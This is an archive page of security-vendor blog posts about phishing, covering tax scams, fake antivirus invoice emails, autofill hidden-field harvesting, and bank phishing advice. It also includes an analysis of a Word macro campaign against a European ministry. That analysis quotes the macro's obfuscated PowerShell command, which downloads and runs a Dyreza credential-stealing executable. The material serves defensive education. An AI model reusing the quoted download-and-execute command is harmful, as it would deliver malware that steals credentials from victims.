Tag Archives: Phishing

Paying taxes is taxing enough

6 steps to protect yourself from being fleeced

The following could be the story plot of the next Hollywood horror blockbuster. Average Paul works hard all year to put food on the table like millions of Americans. And being the good guy that he is, Average Paul understands that paying taxes is part of the game (even though he feels he pays too much of it).

Now, Average Paul has heard he could file his taxes online. He thinks it’s worth a shot: he’s expecting a bit of money back, and if there’s enough, he’ll take the family to Indiana to visit the in-laws. Some websites even say e-filing with them is completely free so why would he go to a physical agent. There’s nothing wrong about that!

So far, so good.

The IRS, which administers the Internal Revenue Code here in the US, is keen to get a share of Average Paul’s revenues and has set-up a secured website for that very purpose. So has scammer Joe Crook, but his website isn’t secure at all. And this is where the horror story begins.

Average Paul is a busy guy, he’s gone online at the end of his latest shift, and he’s entered all sort of personal information on a website he found on Google. The problem is, he’s not on the IRS Internet site, neither he is on a certified website that helps in preparing and e-filing his federal and state Income taxes. He’s made his way onto Joe Crook’s fake website, and he’s about to get scammed.

Preparing your tax returns is a battle itself. Everyone wants to pay the least they can. It’s one of those universal truths. How can you make sure you’re not sharing confidential details with shady characters like Joe Crook? How can you do the right thing without being left out of pocket later on?

How to keep your sensitive information secure and share it only with the right people?

Follow these six steps for complete peace of mind:

  • Make sure the website you’re on is legit. It sounds like a no-brainer, but scammers are well-versed in creating sites that look the real thing. They will even use similar logos and design to spoof you. Don’t be fooled by bogus websites that mirror the official IRS website, or the ones that claim to be secure and help you save money, but a lacking a simple https:// encryption.
  • Stay clear of phishing threats: The IRS saw a 400 percent surge in phishing and malware incidents in the 2016 tax season. We are pretty sure numbers are rising in the current 2017 tax season. Don’t let Joe Crook pose as a government representative, or someone who claims can help you save money.
  • Take control of your email inbox. Don’t act upon emails instructing you to “update your IRS e-file immediately.” Unsurprisingly, such emails are unlikely to originate from an official government agency. Always be careful and verify the origin of the email.
  • Keep your wits about yourself. Scammers change tactics all the time – countless individuals fall for the typical IRS phone impersonation scam. Don’t be one of them, and don’t give away personal information if you receive a call from someone claiming he represents IRS. It is very likely, he/she doesn’t.
  • File your tax return on time. It sounds obvious, and it is: you’re much more likely to fall for a scam if you’ve missed that crucial deadline. Scammers will attempt to put you under pressure, so beat the rush by filing in early. Be smart!
  • Be protected! Having in mind, we are spending a huge portion of our time staring at screens at work or using our mobile handsets; we need to make sure the information on these devices is secure. Antivirus companies, like Panda Security, are here to the rescue informing you every time you go to a website that might be harmful.

Last year the IRS disclosed that more than 700,000 social security numbers and other sensitive information had been stolen. Sadly, there’s no silver bullet to protect yourself when those entrusted with our information fail to keep it safe! Fortunately, you can take action by protecting your computer and mobile devices from malware and virus with Panda Security. The company has brought to the market multiple packages to suit all budgets. It pays to protect your computer.

This tax season, be clever and don’t let Joe Crook fleece you out. By being protected, you are not only saving yourself, but you are preventing Joe Crook from developing his so-called “business.” Don’t support the scammers by being unprepared!

The post Paying taxes is taxing enough appeared first on Panda Security Mediacenter.

Looks like one Avira email but… this is bait!

Looks like one Avira email but... this is bait!

It’s well known that Ransomware often spreads via email. Most of them are phishing emails. Of late some of those emails are claiming in their subject line that they are an invoice from Avira. But that’s not all: they also come with a malicious attachment. Are those real Avira mails? No. Avira will never send […]

The post Looks like one Avira email but… this is bait! appeared first on Avira Blog.

If You Use Autofill, You Might As Well Give Away Your Info For Free


The autofill feature that many browsers offer is a useful time-saving tool that saves you from having to manually fill out forms with the same information every time. Programs include all the necessary information without the user having to go from one field to another to write information that is often repeated in most forms. However, what at first seems to have nothing but upsides for workers and individuals, does in fact carry with it some security risks.

Autofill can be used by cybercriminals to perpetrate phishing attacks in order to collect user data through hidden fields. When the Internet user allows the browser to fill in the form information, it would also fill in a number of spaces that the screen does not display. In this way, when the individual sends the document, she would also be sending her personal information to cybercriminals without realizing it.

Finnish developer Viljami Kuosmanen has revealed how such attacks work with a practical demonstration. He created a form in which only the fields “name” and “email” can be seen, along with a “send” button. However, the source code of the web page harbors some hidden secrets from the user: there are six other fields (phone, organization, address, postal code, city and country), which the browser also automatically populates if the user has activated the autofill function.

The method is a simple strategy to get all sorts of personal information that, according to Kuosmanen tests, can be used in both Chrome and Safari. Other browsers like Opera also offer the autofill feature and Mozilla Firefox is currently working to implement it.

Fortunately for users, it is possible to disable this option in the program settings without too much difficulty. Browsers have it activated by default without asking permission first, so the only way to turn it off is by taking a moment to change the setting manually.

This is a serious threat to the security of personal and corporate information and is difficult to detect because, unlike other types of attacks, the user does not see any links or other types of samples that might lead her to suspect anything is amiss.

It is therefore advisable to disable the option in your browser, even though this means that you’ll be spending a little more time filling out those pesky forms.

The post If You Use Autofill, You Might As Well Give Away Your Info For Free appeared first on Panda Security Mediacenter.

Turning Tables on Nigerian Business Email Scammers

Researchers from Dell SecureWorks infiltrated a Nigerian business email spoofing and business email compromise operation, shutting down a number of money mule accounts in the process.

Malware Capable of Paralyzing an Entire Ministry Neutralized

Cyberthreats are a constant risk and affect public administrations significantly. So much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service, and also, above all, to data leaks concerning everything from personal information to state secrets.

The combination of new technologies and the increase in the complexity of attacks, as well as the professionalization of cybercriminals, is highly dangerous. These are trends that we are predicting for 2017.

Last December, a large-scale spam campaign spanning more than ten countries was carried out, and specifically targeted a major European ministry. The attack, via phishing, was highly advanced and combined social engineering tactics with a powerful Trojan.

The attack is sent by email with an attached Word document. At first, we suspected that it was a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country.

The present analysis describes the technical features of the harmful code found in the macro of the Word document. The goal of the macro was to download and run another malicious component.


Below are shown a few static properties of the analyzed files.

The hash of the Word document is the following:

MD5:  B480B7EFE5E822BD3C3C90D818502068

SHA1:  861ae1beb98704f121e28e57b429972be0410930

According to the document’s metadata, the creation date was 2016-12-19. The malicous code’s signature, downloaded by Word, is the following:

MD5:  3ea61e934c4fb7421087f10cacb14832

SHA1:  bffb40c2520e923c7174bbc52767b3b87f7364a9


1.  Infection Vectors

The Word document gets to the victim’s computer by way of a spam email coming from a healthcare company. The text tricks the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it.

Screen cap of the actual message


According to the data recovered by Panda Security’s Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.

The majority of recipients attempted to open the Word document the same day they received it, December 19.


Map of countries affected by the spam campaign


2. Interactions with the infected system

The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself.

Both the macro and its chains are obfuscated. Also, the macro is designed to run immediately upon being opened.

Part of the obfuscated code contained in the macro

Part of the obfuscated code contained in the macro


Once the macro is running, the Word doc runs the following command in the system:

cmd.exe /c pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle    hidDEN (NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:Users????AppDataRoaming.Exe’);STaRt-PRoCESS ‘C:Users????AppDataRoaming.eXe’

The system symbol (cmd.exe) runs the powershell with two embedded commands going through parameters:

  1. The first powershell command downloads en EXE from this URL (in %APPDATA%.exe): http://xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe
  2. This generates a file in the root of APPDATA.
  3. The next powershell command (Start-process) is used to run the downloaded file.

Thanks to the data obtained by the Intelligence Collective at Panda Security, we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family. Panda’s clients were protected proactively, without need of signatures or updates.

The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to bot network. It then waits for commands from the Command & Control Server. These commands come from the cybercriminals that operate it, and is able to download further new malware and carry out all kinds of malicious actions.

Digitization in Public Administration leads to the exponential growth of the creation, storage and management of huge quantities of confidential data — data that does not allow for a single oversight.

The post Malware Capable of Paralyzing an Entire Ministry Neutralized appeared first on Panda Security Mediacenter.

How to prevent phishing

How to prevent phishing and keep thieves away from your money

Phishing – a hacking technique using fraudulent emails to trick people into handing over their bank account details – continues to be a major threat to personal security. Because these techniques are so successful, criminal continually refine them, making it harder than ever to avoid them.

Fortunately, there are a few steps you can take to better protect yourself – and they are all quite simple.

1. Don’t click links

Phishing emails are so effective because it is very hard to tell them apart from the real thing – they look just like the emails your bank sends. They are also intended to scare you, suggesting that your account has been compromised and you must act immediately to protect yourself.

No matter how concerned you may be, you should never click the links in an email. Even if you are 100% certain that the message comes from your bank.

Instead, you should type the bank’s address yourself into the browser window to make sure you are visiting the correct website. Once successfully logged in, you will be able to access electronic versions of the messages your bank has sent you – including any alerts. If the message is not repeated here, you can safely assume that the email was fraudulent.

You should also bear in mind that all banks typically send printed letters through the post when there is a serious problem with your account.

2. Get educated

All of the banks provide guidance on what a real email looks like – here’s an example from Lloyds Bank. Take a few minutes to acquaint yourself with the information provided and you’ll save yourself a lot of stress in future.

And just to re-emphasise the importance of never clicking links in an email, here’s what Lloyds has to say;

We never link directly to our Internet Banking log on page, or a page that asks for security or personal details.

3. Protect your PC

Computer security software, like Panda Gold Protection, include tools to identify and block phishing emails before you can be tricked by them. It is absolutely essential that every PC, Mac and Android smartphone you own is protected by some form of security software to stop phishing (and other cyberattack techniques) compromising your devices.

Once installed, don’t forget to carry out a regular scan (once a week is ideal) to check to see whether any malware or viruses have breached your defences. Malware can be just as damaging as a phishing email, monitoring what you do on your computer, and stealing passwords for instance. Running a regular scan will give you a chance to identify and delete these malicious apps before you are too badly compromised.

Don’t panic

Protecting against phishing emails is generally just a case of using your common sense. No matter how scary an email looks, take a second to check your online account yourself. Don’t forget that you can always visit your local branch, or the phone banking service to confirm that everything is ok.

Take the first step towards protecting yourself against phishing emails by downloading a free trial of Panda Security now.

The post How to prevent phishing appeared first on Panda Security Mediacenter.